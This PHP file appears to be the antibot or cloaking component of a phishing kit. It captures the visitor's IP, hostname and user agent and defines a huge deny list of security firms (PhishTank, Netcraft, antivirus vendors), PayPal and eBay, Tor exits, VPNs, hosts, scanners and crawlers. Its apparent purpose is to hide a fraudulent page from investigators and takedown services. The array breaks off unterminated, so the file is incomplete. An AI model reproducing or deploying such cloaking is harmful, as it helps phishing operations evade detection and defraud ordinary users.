<?php
$IP = $_SERVER['REMOTE_ADDR'];
$sys_ip=gethostbyaddr($IP);
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$Bots = array(
"vrz-sms.mx.a.cloudfilter.net",
"tmo-west.mx.a.cloudfilter.net",
"LEVEL 3 COMMUNICATIONS",
"Neutral Tandem",
"ONVOY, LLC",
"ONVOY, LLC - TX",
"SOUTHWESTERN BELL",
"TELEPORT COMMUNICATIONS GROUP",
"ALLEGIANCE TELECOM",
"YMAX COMMUNICATIONS CORP",
"XO TEXAS, INC.",
"IONEX COMMUNICATIONS SOUTH, IN",
"IONEX COMMUNICATIONS SOUTH",
"CAPROCK TELECOMMUNICATIONS COR",
"Bandwidth.com",
"Time Warner Communications",
"LOGIX COMMUNICATIONS CORPORATI",
"Western Communications, Inc. dba Logix Communications - TX",
"GRANDE COMMUNICATIONS NETWORKS",
"FUSION COMMUNICATIONS, LLC",
"LOGIX COMMUNICATIONS CORPORATI",
"FRONTIER SOUTHWEST",
"AT&T LOCAL",
"ATT - Local",
"Peak 10",
"Quasi Networks LTD",
"SC Rusnano",
"GoDaddy.com, LLC",
"Server Plan S.r.l.",
"Linode",
"Blazing SEO",
"Inter Connects Inc",
"Flokinet Ltd",
"LukMAN Multimedia Sp. z o.o",
"PIPEX-BLOCK1",
"IPVanish",
"LinkGrid LLC",
"Snab-Inform Private Enterprise",
"Cisco Systems",
"Network and Information Technology Limited",
"London Wires Ltd.",
"Tehnologii Budushego LLC",
"Eonix Corporation",
"hosttech GmbH",
"Wowrack.com",
"SunGard Availability Services LP",
"Internap Network Services Corporation",
"Palo Alto Networks",
"PlusNet Technologies Ltd",
"Scaleway",
"Facebook",
"Host1Plus",
"XO Communications",
"Nobis Technology Group",
"ExpressVPN",
"DME Hosting LLC",
"Prescient Software",
"Sungard Network Solutions",
"OVH SAS",
"Iomart Hosting Ltd",
"Hosting Solution",
"Barracuda Networks",
"Solar VPS",
"PHPNET Hosting Services",
"DigitalOcean",
"Level 3 Communications",
"softlayer",
"Chelyabinsk-Signal LLC",
"SoftLayer Technologies",
"Complete Internet Access",
"london-tor.mooo.com",
"amazonaws",
"cyveillance",
"phishtank",
"tor.piratenpartei-nrw.de",
"cpanel66.proisp.no",
"tor-node.com",
"dreamhost",
"Involta",
"exit0.liskov.tor-relays.net",
"tor.tocici.com",
"netpilot",
"calyxinstitute",
"tor-exit",
"msnbot",
"p3pwgdsn",
"netcraft",
"University of Virginia",
"trendmicro",
"ebay",
"paypal",
"torservers",
"comodo",
"EGIHosting",
"ebbs.healingpathsolutions.com",
"healingpathsolutions.com",
"Solution Pro",
"Zayo Bandwidth",
"spider.clicktargetdevelopment.com",
"clicktargetdevelopment.com",
"static.spro.net",
"Digital Ocean",
"Blue Coat Systems",
"GANDI SAS",
"roamsite.com",
"ColoUp",
"Westnet",
"The University of Tokyo",
"University",
"University of",
"QuadraNet",
"exit-01a.noisetor.net",
"noisetor.net",
"noisetor",
"vultr.com",
"Zscaler",
"Choopa",
"RedSwitches Pty",
"Quintex Alliance Consulting",
"www16.mailshell.com",
"this.is.a.tor.exit-node.net",
"this.is.a.tor.node.xmission.com",
"colocrossing.com",
"DedFiberCo",
"sucuri.net",
"crawler",
"proxy",
"enom",
"cloudflare",
"yahoo",
"trustwave",
"rima-tde.net",
"tfbnw.net",
"pacbell.net",
"tpnet.pl",
"ovh.net",
"centralnic",
"badware",
"phishing",
"SiteAdvisor",
"McAfee",
"Bitdefender",
"avirasoft",
"phishtank.com",
"googleusercontent",
"Yahoo",
"Yahoo! Inc.",
"Google",
"Google Inc.",
"GoDaddy",
"Amazon Technologies Inc.",
"Amazon",
"Top Level Hosting SRL",
"Twitter",
"Microsoft",
"Microsoft Corporation",
"OVH",
"VPSmalaysia.com.my",
"Madgenius.com",
"Barracuda Networks Inc.",
"Barracuda",
"SecuredConnectivity.net",
"Digital Domain",
"Hetzner Online",
"Akamai",
"SoftLayer",
"SURFnet",
"Creative Thought Inc.",
"Fastly",
"Return Path Inc.",
"WhatsApp",
"Instagram",
"Schulte Consulting LLC",
"Universidade Federal do Rio de Janeiro",
"Sectoor",
"Bitfolk",
"DIR A/S",
"Team Technologies LLC",
"Mainloop",
"Junk Email Filter Inc.",
"Art Matrix - Lightlink Inc.",
"Redpill Linpro AS",
"CloudFlare",
"ESET spol. s r.o.",
"AVAST Software s.r.o.",
"Dosarrest",
"Apple Inc.",
"Symantec",
"Mozilla",
"Netprotect SRL",
"Host Europe GmbH",
"Host Sailor Ltd.",
"PSINet Inc.",
"Daniel James Austin",
"RamNode",
"Hostalia",
"Xs4all Internet BV",
"Inktomi Corporation",
"Eircom Customer Assignment",
"9New Network Inc",
"Sony",
"Private IP Address LAN",
"Computer Problem Solving",
"Fortinet",
"Avira",
"Rackspace",
"Baidu",
"Comodo",
"Incapsula Inc",
"Orange Polska Spolka Akcyjna",
"Infosphere",
"Private Customer",
"SurfControl",
"University of Newcastle upon Tyne",
"Total Server Solutions",
"LukMAN",
"eSecureData",
"Hosting",
"VI Na Host Co. Ltd",
"B2 Net Solutions",
"Master Internet",
"Global Perfomance",
"Fireeye",
"AntiVirus",
"Security",
"Intersoft Internet",
"Voxility",
"Internet-Pro",
"Trustwave Holdings Inc",
"Online SAS",
"Versaweb",
"Liquid Web",
"A100 ROW",
"Apexis AG",
"Apexis",
"LogicWeb",
"Virtual1 Limited",
"VNET a.s.",
"Static IP Assignment",
"TerraTransit AG",
"Merit Network",
"PathsConnect",
"Long Thrive",
"LG DACOM",
"Secure Internet",
"Kaspersky",
"UK Dedicated Servers Limited",
"Customer Network",
"Flokinet",
"Simpli Networks LLC",
"Psychz",
"PrivateSystems Networks",
"ScanSafe Services",
"CachedNet",
"CloudVPN",
"Spark New Zealand Trading Ltd",
"Whitelabel IT Solutions Corp",
"Hostwinds",
"Hosteros LLC",
"HostUS",
"Host",
"ClientID",
"Server",
"Oracle",
"Unus Inc.",
"Public facing services",
"Virtual Employee Pvt Ltd",
"Dataline Ltd",
"Teksavvy Solutions Inc.",
"UPC Romania Bucuresti",
"TalkTalk Communications Limited",
"British Telecommunications PLC",
"Global Data Networks LLC",
"Online S.A.S.",
"Content Delivery Network Ltd",
"Nobis Technology Group LLC",
"Parrukatu",
"JSC ER-Telecom Holding",
"ChinaNet Fujian Province Network",
"QualityNetwork",
"Vist On-Line Ltd",
"The Calyx Institute",
"Internet Customers",
"OJSC Oao Tattelecom",
"Petersburg Internet Network Ltd.",
"Psychz Networks",
"Udasha",
"Onavo Mobile Ltd",
"Cubenode System SL",
"OVH Hosting Inc.",
"NForce Entertainment B.V.",
"DigitalOcean LLC",
"Glenayre Electronics Inc.",
"Iomart Hosting Limited",
"Digital Energy Technologies Limited",
"Cisco Systems Inc.",
"Vultr Holdings LLC",
"Amazon.com Inc.",
"Web Hosting Solutions",
"Time Warner Cable Internet LLC",
"Internet Security - TC",
"Vertical Telecoms Broadband Networks and Internet Provider",
"Ventelo Wholesale",
"MYX Group LLC",
"France Telecom S.A.",
"Nine Internet Solutions AG",
"Microsoft Azure",
"Choopa, LLC",
"HighWinds Network",
"Amazon.com",
"Bell Canada",
"M247 LTD Frankfurt Infrastructure",
"Spectrum",
"ImOn Communications, LLC",
"Wintek Corporation",
"ServerMania",
"Claro Dominican Republic",
"013 NetVision",
"TalkTalk",
"HostDime.com",
"Host1Plus Cloud Servers",
"Amazon Data Services NoVa",
"Google Cloud",
"M-net",
"Digiweb ltd",
"Eir Broadband",
"Plusnet",
"GigeNET",
"ZenLayer",
"NFOrce Entertainment B.V.",
"NewMedia Express",
"Telegram Messenger Network",
"IQ PL Sp. z o.o.",
"Datacamp Limited",
"Tahoe Internet Exchange (TahoeIX)",
"ITCOM Shpk",
"HEG US",
"bot",
"above",
"google",
"softlayer",
"cyveillance",
"compatible",
"facebook",
"phishtank",
"dreamhost",
"netpilot",
"calyxinstitute",
"tor-exit",
"apache-httpclient",
"lssrocketcrawler",
"Trident",
"Macintosh",
"crawler",
"urlredirectresolver",
"jetbrains",
"spam",
"windows95",
"windows98",
"acunetix",
"netsparker",
"007ac9",
"008",
"192.comagent",
"200pleasebot",
"360spider",
"4seohuntbot",
"50.nu",
"a6-indexer",
"admantx",
"amznkassocbot",
"aboundexbot",
"aboutusbot",
"abravespider",
"accelobot",
"acoonbot",
"addthis.com",
"adsbot-google",
"ahrefsbot",
"alexabot",
"amagit.com",
"antbot",
"apercite",
"aportworm",
"arabot",
"crawl",
"slurp",
"spider",
"seek",
"accoona",
"adressendeutschland",
"ah-ha.com",
"ahoy",
"altavista",
"ananzi",
"anthill",
"appie",
"arachnophilia",
"arale",
"araneo",
"aranha",
"architext",
"aretha",
"arks",
"asterias",
"atlocal",
"atn",
"atomz",
"augurfind",
"backrub",
"bannana_bot",
"baypup",
"bdfetch",
"bigbrother",
"biglotron",
"bjaaland",
"blaiz",
"blog",
"blo.",
"bloodhound",
"boitho",
"booch",
"bradley",
"butterfly",
"calif",
"cassandra",
"ccubee",
"cfetch",
"charlotte",
"churl",
"cienciaficcion",
"cmc",
"collective",
"comagent",
"combine",
"computingsite",
"csci",
"cusco",
"daumoa",
"deepindex",
"delorie",
"depspid",
"deweb",
"dieblindekuh",
"digger",
"ditto",
"dmoz",
"docomo",
"downloadexpress",
"dtaagent",
"dwcp",
"ebiness",
"ebingbong",
"e-collector",
"ejupiter",
"emacs-w3searchengine",
"esther",
"evliyacelebi",
"ezresult",
"falcon",
"felixide",
"ferret",
"fetchrover",
"fido",
"findlinks",
"fireball",
"fishsearch",
"fouineur",
"funnelweb",
"gazz",
"gcreep",
"genieknows",
"getterroboplus",
"geturl",
"glx",
"goforit",
"golem",
"grabber",
"grapnel",
"gralon",
"griffon",
"gromit",
"grub",
"gulliver",
"hamahakki",
"harvest",
"havindex",
"helix",
"heritrix",
"hkuwwwoctopus",
"homerweb",
"htdig",
"htmlindex",
"html_analyzer",
"htmlgobble",
"hubater",
"hyper-decontextualizer",
"ibm_planetwide",
"ichiro",
"iconsurf",
"iltrovatore",
"image.kapsi.net",
"imagelock",
"incywincy",
"indexer",
"infobee",
"informant",
"ingrid",
"inktomisearch.com",
"inspectorweb",
"intelliagent",
"internetshinchakubin",
"ip3000",
"iron33",
"israeli-search",
"ivia",
"jack",
"jakarta",
"javabee",
"jetbot",
"jumpstation",
"katipo",
"kdd-explorer",
"kilroy",
"knowledge",
"kototoi",
"kretrieve",
"labelgrabber",
"lachesis",
"larbin",
"legs",
"libwww",
"linkalarm",
"linkvalidator",
"linkscan",
"lockon",
"lwp",
"lycos",
"magpie",
"mantraagent",
"mapoftheinternet",
"marvin/",
"mattie",
"mediafox",
"mediapartners",
"mercator",
"merzscope",
"microsofturlcontrol",
"minirank",
"miva",
"mnogosearch",
"moget",
"monster",
"moose",
"motor",
"multitext",
"muncher",
"muscatferret",
"mwd.search",
"myweb",
"najdi",
"nameprotect",
"nationaldirectory",
"nazilla",
"ncsabeta",
"nec-meshexplorer",
"nederland.zoek",
"netcartawebmapengine",
"netmechanic",
"netresearchserver",
"netscoop",
"newscan-online",
"nhse",
"nokia6682/",
"nomad",
"noyona",
"nzexplorer",
"objectssearch",
"occam",
"omni",
"opentext",
"openfind",
"openintelligencedata",
"orbsearch",
"osis-project",
"packrat",
"pageboy",
"pagebull",
"page_verifier",
"panscient",
"parasite",
"partnersite",
"patric",
"pear.",
"pegasus",
"peregrinator",
"pgpkeyagent",
"phantom",
"phpdig",
"picosearch",
"piltdownman",
"pimptrain",
"pinpoint",
"pioneer",
"piranha",
"plumtreewebaccessor",
"pogodak",
"poirot",
"pompos",
"poppelsdorf",
"poppi",
"populariconoclast",
"psycheclone",
"publisher",
"rambler",
"ravensearch",
"roach",
"roadrunner",
"roadhouse",
"robbie",
"robofox",
"robozilla",
"rules",
"salty",
"sbider",
"scooter",
"scrubby",
"search.",
"searchprocess",
"semanticdiscovery",
"senrigan",
"sg-scout",
"shai'hulud",
"shark",
"shopwiki",
"sidewinder",
"sift",
"silk",
"simmany",
"sitesearcher",
"sitevalet",
"sitetech-rover",
"skymob.com",
"sleek",
"smartwit",
"sna-",
"snappy",
"snooper",
"sohu",
"speedfind",
"sphere",
"sphider",
"spinner",
"spyder",
"steeler/",
"suke",
"suntek",
"supersnooper",
"surfnomore",
"sven",
"szukacz",
"tachblackwidow",
"tarantula",
"templeton",
"/teoma",
"t-h-u-n-d-e-r-s-t-o-n-e",
"theophrastus",
"titan",
"titin",
"tkwww",
"toutatis",
"t-rex",
"tutorgig",
"twiceler",
"twisted",
"ucsd",
"udmsearch",
"urlcheck",
"updated",
"vagabondo",
"valkyrie",
"verticrawl",
"victoria",
"vision-search",
"volcano",
"voyager/",
"voyager-hc",
"w3c_validator",
"w3m2",
"w3mir",
"walker",
"wallpaper",
"wanderer",
"wauuu",
"wavefire",
"webcore",
"webhopper",
"webwombat",
"webbandit",
"webcatcher",
"webcopy",
"webfoot",
"weblayers",
"weblinker",
"weblogmonitor",
"webmirror",
"webmonkey",
"webquest",
"webreaper",
"websitepulse",
"websnarf",
"webstolperer",
"webvac",
"webwalk",
"webwatch",
"webzinger",
"whizbang",
"whowhere",
"wildferret",
"worldlight",
"wwwc",
"wwwster",
"xenu",
"xift",
"xirq",
"yandex",
"yanga",
"yeti",
"yahoo!",
"abot",
"dbot",
"ebot",
"hbot",
"kbot",
"lbot",
"mbot",
"nbot",
"obot",
"pbot",
"rbot",
"sbot",
"tbot",
"vbot",
"ybot",
"zbot",
"bot.",
"bot/",
"_bot",
".bot",
"/bot",
"-bot",
":bot",
"(bot",
"siteexplorer",
"xget",
"yodao",
"zao/",
"zippp",
"zyborg",
"proximic",
"Baiduspider",
"Cliqzbot",
"A6-Indexer",
"AhrefsBot",
"Genieo",
"BomboraBot",
"CCBot",
"URLAppendBot",
"DomainAppender",
"msnbot-media",
"Antivirus",
"YoudaoBot",
"MJ12bot",
"linkdexbot",
"Go-http-client",
"Googlebot",
"PhantomJS",
"applebot",
"metauri.com",
"Twitterbot",
"R6_FeedFetcher",
"NetcraftSurveyAgent",
"Sogouwebspider",
"bingbot",
"Yahoo!Slurp",
"facebookexternalhit",
"PrintfulBot",
"msnbot",
"UnwindFetchor",
"urlresolver",
"Butterfly",
"TweetmemeBot",
"PaperLiBot",
"Exabot",
"Ezooms",
"YandexBot",
"SearchmetricsBot",
"picsearch",
"TweetedTimesBot",
"QuerySeekerSpider",
"ShowyouBot",
"woriobot",
"merlinkbot",
"BazQuxBot",
"Kraken",
"SISTRIXCrawler",
"R6_CommentReader",
"magpie-crawler",
"GrapeshotCrawler",
"PercolateCrawler",
"MaxPointCrawler",
"NetSeercrawler",
"grokkit-crawler",
"SMXCrawler",
"PulseCrawler",
"Y!J-BRW",
"80legs.com/webcrawler",
"Mediapartners-Google",
"Spinn3r",
"InAGist",
"Python-urllib",
"NING",
"TencentTraveler",
"Feedfetcher-Google",
"mon.itor.us",
"spbot",
"Feedly",
"java",
"avg",
"avira",
"bitdefender",
"kaspersky",
"sophos",
"big brother",
"die blinde kuh",
"download express",
"emacs-w3 search engine",
"evliya celebi",
"felix ide",
"fish search",
"hku www octopus",
"html index",
"inspector web",
"internet shinchakubin",
"link validator",
"microsoft url control",
"ncsa beta",
"netcarta webmap engine",
"open text",
"orb search",
"pack rat",
"pgp key agent",
"popular iconoclast",
"raven search",
"road runner",
"site searcher",
"site valet",
"tach black widow",
"url check",
"web core",
"web hopper",
"web wombat",
"weblog monitor",
"wild ferret",
"BingPreview",
"go-http-client",
"go-http-client/1.1",
"trident",
"presto",
"virustotal",
"unchaos",
"dreampassport",
"sygol",
"nutch",
"privoxy",
"zipcommander",
"neofonie",
"abacho",
"acoi",
"acoon",
"adaxas",
"agada",
"aladin",
"alkaline",
"amibot",
"anonymizer",
"aplix",
"aspseek",
"avant",
"baboom",
"anzwers",
"anzwerscrawl",
"crawlconvera",
"del.icio.us",
"camehttps",
"annotate",
"wapproxy",
"translate",
"feedfetcher",
"ask24",
"asked",
"askaboutoil",
"fangcrawl",
"amzn_assoc",
"bingpreview",
"dr.web",
"drweb",
"bilbo",
"blackwidow",
"sogou",
"sogou-test-spider",
"exabot",
"externalhit",
"ia_archiver",
"mj12",
"okhttp",
"simplepie",
"curl",
"wget",
"virus",
"pipes",
"antivirus",
"python",
"ruby",
"avast",
"firebird",
"scmguard",
"adsbot",
"weblight",
"favicon",
"analytics",
"insights",
"headless",
"github",
"node",
"agusescan",
"zteopen",
"majestic12",
"SimplePie",
"SAMSUNG-SGH-E250",
"DoCoMo/2.0 N905i",
"SiteLockSpider",
"okhttp/2.5.0",
"ips-agent",
"scoutjet",
"UptimeRobot",
"FM Scene",
"Prevx",
"WindowsPowerShell",
"ssltools.digicert",
"virustotalcloud",
"HeadlessChrome",
"Nexus",
"Spectrum",
"sendgrid",
"amazonaws",
"amazonses",
"mailgun",
"charter",
"(bot",
"-bot",
".bot",
"/bot",
"/teoma",
"360Spider",
"404checker",
"404enemy",
"80legs",
":bot",
"A6-Indexer",
"ADmantX",
"AIBOT",
"ASPSeek",
"Abonti",
"Aboundex",
"Aboundexbot",
"Acunetix",
"AfD-Verbotsverfahren",
"AhrefsBot",
"AiHitBot",
"Aipbot",
"Alexibot",
"AllSubmitter",
"Alligator",
"AlphaBot",
"Anarchie",
"Ankit",
"Antivirus",
"Apexoo",
"Aspeigel",
"Asterias",
"Attach",
"AwarioRssBot",
"AwarioSmartBot",
"BBBike",
"BDCbot",
"BDFetch",
"BLEXBot",
"BackDoorBot",
"BackStreet",
"BackWeb",
"Backlink-Ceck",
"BacklinkCrawler",
"Badass",
"Baiduspider",
"Bandit",
"Barkrowler",
"BatchFTP",
"Battleztar Bazinga",
"BetaBot",
"Bigfoot",
"BingPreview",
"Bitacle",
"Black Hole",
"BlackWidow",
"Blackboard",
"Blow",
"BlowFish",
"Boardreader",
"Bolt",
"BomboraBot",
"BotALot",
"Brandprotect",
"Brandwatch",
"Buddy",
"BuiltBotTough",
"BuiltWith",
"Bullseye",
"BunnySlippers",
"BuzzSumo",
"CATExplorador",
"CCBot",
"CSHttp",
"Calculon",
"CazoodleBot",
"Cegbfeieh",
"CheTeam",
"CheeseBot",
"CherryPicker",
"ChinaClaw",
"Chlooe",
"Claritybot",
"Cliqzbot",
"Cloud mapping",
"Cogentbot",
"Collector",
"Copier",
"CopyRightCheck",
"Copyscape",
"Cosmos",
"Craftbot",
"CrazyWebCrawler",
"Crescent",
"CrunchBot",
"Curious",
"Custo",
"DBLBot",
"DIIbot",
"DSearch",
"DTS Agent",
"DataCha0s",
"DatabaseDriverMysqli",
"Demon",
"Deusu",
"Devil",
"Digincore",
"DigitalPebble",
"Dirbuster",
"Disco",
"Discobot",
"Discoverybot",
"Dispatch",
"DittoSpyder",
"DnyzBot",
"DoCoMo/2.0 N905i",
"DomainAppender",
"DomainCrawler",
"DomainSigmaCrawler",
"DomainStatsBot",
"Dotbot",
"Download Wonder",
"Dragonfly",
"Drip",
"ECCP/1.0",
"EMail Siphon",
"EMail Wolf",
"EasyDL",
"Ebingbong",
"Ecxi",
"EirGrabber",
"EroCrawler",
"Evil",
"Exabot",
"Express WebPictures",
"ExtLinksBot",
"Extractor",
"ExtractorPro",
"Extreme Picture Finder",
"EyeNetIE",
"Ezooms",
"FDM",
"FHscan",
"FM Scene",
"FemtosearchBot",
"Fimap",
"Firefox/7.0",
"FlashGet",
"Flunky",
"Foobot",
"Freeuploader",
"FrontPage",
"FyberSpider",
"Fyrebot",
"G-i-g-a-b-o-t",
"GT::WWW",
"GalaxyBot",
"Genieo",
"GermCrawler",
"GetRight",
"GetWeb",
"Getintent",
"Gigablast",
"Gigabot",
"Go!Zilla",
"Go-Ahead-Got-It",
"Go-http-client",
"GoZilla",
"Googlebot",
"Gotit",
"GrabNet",
"Grabber",
"Grafula",
"GrapeFX",
"GrapeshotCrawler",
"GridBot",
"HEADMasterSEO",
"HMView",
"HTMLparser",
"HTTP::Lite",
"HTTrack",
"Haansoft",
"HaosouSpider",
"Harvest",
"Havij",
"Heritrix",
"Hloader",
"Humanlinks",
"HybridBot",
"IDBot",
"IRLbot",
"Iblog",
"Id-search",
"IlseBot",
"Image Fetch",
"Image Sucker",
"IndeedBot",
"Indy Library",
"InfoNaviRobot",
"InfoTekies",
"Intelliseek",
"InterGET",
"Internet Ninja",
"InternetSeer",
"Iria",
"Iskanie",
"IstellaBot",
"JOC Web Spider",
"JamesBOT",
"Jbrofuzz",
"JennyBot",
"JetCar",
"Jetty",
"JikeSpider",
"Joomla",
"Jorgee",
"JustView",
"Jyxobot",
"Kenjin Spider",
"Keyword Density",
"Kinza",
"Kozmosbot",
"LNSpiderguy",
"LWP::Simple",
"Lanshanbot",
"Larbin",
"LeechFTP",
"LeechGet",
"LexiBot",
"Lftp",
"LibWeb",
"Libwhisker",
"LieBaoFast",
"Lightspeedsystems",
"Likse",
"LinkScan",
"LinkWalker",
"Linkdexbot",
"LinkextractorPro",
"LinkpadBot",
"LinksManager",
"LinqiaMetadataDownloaderBot",
"LinqiaRSSBot",
"LinqiaScrapeBot",
"Lipperhey",
"Lipperhey Spider",
"Litemage_walker",
"Lmspider",
"Ltx71",
"MFC_Tear_Sample",
"MIDown tool",
"MIIxpc",
"MJ12bot",
"MQQBrowser",
"MSFrontPage",
"MSIECrawler",
"Mag-Net",
"Magnet",
"Mail.RU_Bot",
"Majestic SEO",
"Majestic-SEO",
"Majestic12",
"MarkMonitor",
"MarkWatch",
"Mass Downloader",
"Masscan",
"Mata Hari",
"MauiBot",
"Mb2345Browser",
"MeanPath Bot",
"Meanpathbot",
"Mediatoolkitbot",
"MegaIndex.ru",
"Metauri",
"MicroMessenger",
"Microsoft Data Access",
"Microsoft URL Control",
"Mister PiX",
"Mojeek",
"Mojolicious",
"Morfeus Fucking Scanner",
"Mr.4x3",
"Msrabot",
"Musobot",
"NICErsPRO",
"NPbot",
"Name Intelligence",
"Nameprotect",
"Navroad",
"NearSite",
"Needle",
"Nessus",
"Net Vampire",
"NetAnts",
"NetLyzer",
"NetMechanic",
"NetSpider",
"NetZIP",
"Netcraft",
"Nettrack",
"Netvibes",
"NextGenSearchBot",
"Nibbler",
"Niki-bot",
"Nikto",
"NimbleCrawler",
"Nimbostratus",
"Ninja",
"Nmap",
"Nutch",
"OPPO A33",
"Octopus",
"Offline Explorer",
"Offline Navigator",
"OnCrawl",
"OpenLinkProfiler",
"OpenVAS",
"Openfind",
"Openvas",
"OrangeBot",
"OrangeSpider",
"OutclicksBot",
"OutfoxBot",
"PECL::HTTP",
"PHPCrawl",
"POE-Component-Client-HTTP",
"Page Analyzer",
"PageAnalyzer",
"PageGrabber",
"PageScorer",
"Pandalytics",
"Panscient",
"Papa Foto",
"Pavuk",
"PeoplePal",
"Pi-Monster",
"Picscout",
"Picsearch",
"PictureFinder",
"Pimonster",
"Pixray",
"PleaseCrawl",
"Pockey",
"Prevx",
"ProPowerBot",
"ProWebWalker",
"Probethenet",
"Psbot",
"Pump",
"PxBroker",
"PyCurl",
"QueryN Metasearch",
"Quick-Crawler",
"RSSingBot",
"RankActive",
"RankActiveLinkBot",
"RankFlex",
"RankingBot",
"RankingBot2",
"Rankivabot",
"RankurBot",
"ReGet",
"RealDownload",
"Reaper",
"RebelMouse",
"Recorder",
"RedesScrapy",
"RepoMonkey",
"Ripper",
"RocketCrawler",
"Rogerbot",
"SAMSUNG-SGH-E250",
"SBIder",
"SEOkicks",
"SEOkicks-Robot",
"SEOlyticsCrawler",
"SEOprofiler",
"SEOstats",
"SISTRIX",
"SMTBot",
"SalesIntelligent",
"ScanAlert",
"Scanbot",
"ScoutJet",
"Scrapy",
"Screaming",
"ScreenerBot",
"Searchestate",
"SearchmetricsBot",
"Semrush",
"SemrushBot",
"SeoSiteCheckup",
"Seomoz",
"Shodan",
"SimplePie",
"Siphon",
"Site Sucker",
"SiteExplorer",
"SiteLockSpider",
"SiteSnagger",
"SiteSucker",
"Sitebeam",
"Siteimprove",
"Sitevigil",
"SlySearch",
"SmartDownload",
"Snake",
"Snapbot",
"Snoopy",
"SocialRankIOBot",
"Sociscraper",
"Sogou web spider",
"Sosospider",
"Sottopop",
"SpaceBison",
"Spammen",
"SpankBot",
"Spanner",
"Spbot",
"Spinn3r",
"SputnikBot",
"Sqlmap",
"Sqlworm",
"Sqworm",
"Steeler",
"Stripper",
"Sucker",
"Sucuri",
"SuperBot",
"SuperHTTP",
"Surfbot",
"SurveyBot",
"Suzuran",
"Swiftbot",
"Szukacz",
"T0PHackTeam",
"T8Abot",
"Teleport",
"TeleportPro",
"Telesoft",
"Telesphoreo",
"Telesphorep",
"The Intraformant",
"TheNomad",
"Thumbor",
"TightTwatBot",
"Titan",
"Toata",
"Toweyabot",
"Tracemyfile",
"Trendiction",
"Trendictionbot",
"True_Robot",
"Turingos",
"Turnitin",
"TurnitinBot",
"TwengaBot",
"Twice",
"Typhoeus",
"URLAppendBot",
"URLy Warning",
"URLy.Warning",
"UnisterBot",
"Upflow",
"UptimeRobot",
"VB Project",
"VCI",
"Vacuum",
"Vagabondo",
"VeriCiteCrawler",
"VidibleScraper",
"Virusdie",
"VoidEYE",
"Voil",
"Voltron",
"WASALive-Bot",
"WBSearchBot",
"WEBDAV",
"WISENutbot",
"WPScan",
"WWW-Collector-E",
"WWW-Mechanize",
"WWW::Mechanize",
"WWWOFFLE",
"Wallpapers/3.0",
"WallpapersHD",
"WeSEE",
"Web Auto",
"Web Collage",
"Web Enhancer",
"Web Fetch",
"Web Fuck",
"Web Pix",
"Web Sauger",
"Web Sucker",
"WebAuto",
"WebBandit",
"WebCollage",
"WebCopier",
"WebEnhancer",
"WebFetch",
"WebFuck",
"WebGo IS",
"WebImageCollector",
"WebLeacher",
"WebPix",
"WebReaper",
"WebSauger",
"WebStripper",
"WebSucker",
"WebWhacker",
"WebZIP",
"Webalta",
"WebmasterWorldForumBot",
"Webshag",
"Website Quester",
"WebsiteExtractor",
"WebsiteQuester",
"Webster",
"Whack",
"Whacker",
"Whatweb",
"Who.is Bot",
"Widow",
"WinHTTrack",
"WindowsPowerShell",
"WiseGuys Robot",
"Wonderbot",
"Woobot",
"Wotbox",
"Wprecon",
"Xaldon WebSpider",
"Xaldon_WebSpider",
"Xenu",
"YoudaoBot",
"Zade",
"Zauba",
"Zermelo",
"Zeus",
"Zitebot",
"ZmEu",
"ZumBot",
"ZyBorg",
"_bot",
"abacho",
"abot",
"accoona",
"acoi",
"acoon",
"adaxas",
"adressendeutschland",
"adsbot",
"agada",
"agusescan",
"ah-ha.com",
"ahoy",
"aladin",
"alkaline",
"altavista",
"amibot",
"amzn_assoc",
"analytics",
"ananzi",
"annotate",
"anonymizer",
"anthill",
"antivirus",
"anzwers",
"anzwerscrawl",
"aplix",
"appie",
"arachnophilia",
"arale",
"araneo",
"aranha",
"architext",
"archive.org_bot",
"aretha",
"arks",
"arquivo-web-crawler",
"arquivo.pt",
"ask24",
"askaboutoil",
"asked",
"aspseek",
"asterias",
"atlocal",
"atn",
"atomz",
"augurfind",
"autoemailspider",
"avant",
"avast",
"avg",
"avira",
"baboom",
"backlink-check",
"backrub",
"bannana_bot",
"baypup",
"bdfetch",
"big brother",
"biglotron",
"bilbo",
"bingpreview",
"bitdefender",
"bjaaland",
"blackwidow",
"blaiz",
"blo.",
"blog",
"bloodhound",
"boitho",
"booch",
"bot.",
"bot/",
"bradley",
"butterfly",
"calif",
"camehttps",
"cassandra",
"ccubee",
"cfetch",
"charlotte",
"churl",
"cienciaficcion",
"cmc",
"coccocbot-web",
"cognitiveseo",
"collective",
"com.plumanalytics",
"comagent",
"combine",
"computingsite",
"crawl",
"crawl.sogou.com",
"crawlconvera",
"crawler.feedback",
"crawler4j",
"csci",
"curl",
"cusco",
"daumoa",
"dbot",
"deepindex",
"del.icio.us",
"delorie",
"demandbase-bot",
"depspid",
"deweb",
"die blinde kuh",
"digger",
"ditto",
"dmoz",
"docomo",
"download express",
"dr.web",
"dreampassport",
"drweb",
"dtaagent",
"dwcp",
"e-collector",
"eCatch",
"ebiness",
"ebingbong",
"ebot",
"ejupiter",
"emacs-w3 search engine",
"esther",
"evc-batch",
"evliya celebi",
"exabot",
"externalhit",
"ezresult",
"facebookscraper",
"falcon",
"fangcrawl",
"favicon",
"feedfetcher",
"felix ide",
"ferret",
"fetchrover",
"fido",
"findlinks",
"fireball",
"firebird",
"fish search",
"fouineur",
"funnelweb",
"gazz",
"gcreep",
"genieknows",
"getterroboplus",
"geturl",
"github",
"glx",
"go-http-client",
"go-http-client/1.1",
"goforit",
"golem",
"grabber",
"gralon",
"grapnel",
"griffon",
"gromit",
"grub",
"gulliver",
"hamahakki",
"harvest",
"havindex",
"hbot",
"headless",
"helix",
"heritrix",
"hku www octopus",
"homerweb",
"htdig",
"html index",
"html_analyzer",
"htmlgobble",
"hubater",
"hyper-decontextualizer",
"ia_archiver",
"ibm_planetwide",
"ichiro",
"iconsurf",
"iltrovatore",
"image.kapsi.net",
"imagelock",
"incywincy",
"indexer",
"infobee",
"informant",
"ingrid",
"inktomisearch.com",
"insights",
"inspector web",
"instabid",
"intelliagent",
"internet shinchakubin",
"internetVista monitor",
"ip3000",
"ips-agent",
"iron33",
"israeli-search",
"ivia",
"jack",
"jakarta",
"javabee",
"jetbot",
"jumpstation",
"kaspersky",
"katipo",
"kbot",
"kdd-explorer",
"keywen.com",
"kilroy",
"knowledge",
"kototoi",
"kretrieve",
"labelgrabber",
"lachesis",
"larbin",
"lbot",
"legs",
"libwww",
"link validator",
"linkalarm",
"linkdexbot",
"linkscan",
"lockon",
"lwp",
"lwp-request",
"lwp-trivial",
"lycos",
"magpie",
"magpie-crawler",
"majestic12",
"mantraagent",
"mapoftheinternet",
"marvin/",
"mattie",
